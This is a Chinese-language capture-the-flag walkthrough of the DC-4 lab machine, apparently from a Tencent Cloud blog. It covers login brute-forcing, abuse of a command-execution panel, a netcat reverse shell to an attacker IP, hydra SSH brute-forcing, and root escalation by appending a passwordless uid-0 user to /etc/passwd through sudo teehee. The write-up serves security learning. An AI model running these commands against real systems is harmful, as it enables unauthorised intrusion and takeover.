前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >靶机渗透DC-4

靶机渗透DC-4

原创
作者头像
HipHip
修改2020-04-17 14:31:36
4530
修改2020-04-17 14:31:36
举报
文章被收录于专栏:靶机渗透

拿来就给出一个网站,其他的啥也没给。

001
001

最初想法是御剑扫描一下,但是发现也没什么有用的信息,还是只有一个管理登录框。

那就爆破吧······

002
002

成功爆到一个密码。

(Ps:平时要积累字典啊,用的时候现去找的·····)

登陆后台。

003
003

发现可以进行命令执行,抓包看看。

004
004

这里可以利用啊。执行个whoami看看。

005
005

可以执行。

接下来使用nc监听反弹shell。

代码语言:javascript
复制
nc -lnvp 444
nc -e /bin/bash 192.168.70.154 444

006
006

然后在目录里翻翻。在home目录里看到两个用户。在jim的用户目录里找到了密码的线索。

007
007

然后hydra爆破

代码语言:javascript
复制
hydra -l jim -P jim.txt ssh://192.168.70.158

008
008

成功爆到密码。

SSH登陆账户。

009
009

随便看看。

010
010

呦,mbox是root用户发来的。

看了下test.sh.

011
011

继续翻目录,在var/mails目录下找到了jim文件,查看。

012
012

是charles发给jim的信息,透露了Password。

直接切换到charles用户。

013
013

sudo -l看看。

014
014

哎嘿,出来了路径。

teehee -help发现-a命令执行命令追加文件内容,不用进行覆盖。

代码语言:javascript
复制
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

015
015
代码语言:javascript
复制
用户名-hack
是否有密码—空
uid—0——root权限
用户信息记录位置—空
家目录—空
登录的命令解释器–/bin/bash

直接su hack,不用密码即可登陆,直接是root权限。cat flag即可。

016
016

这一关卡在于最后的teehee追加文件内容。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档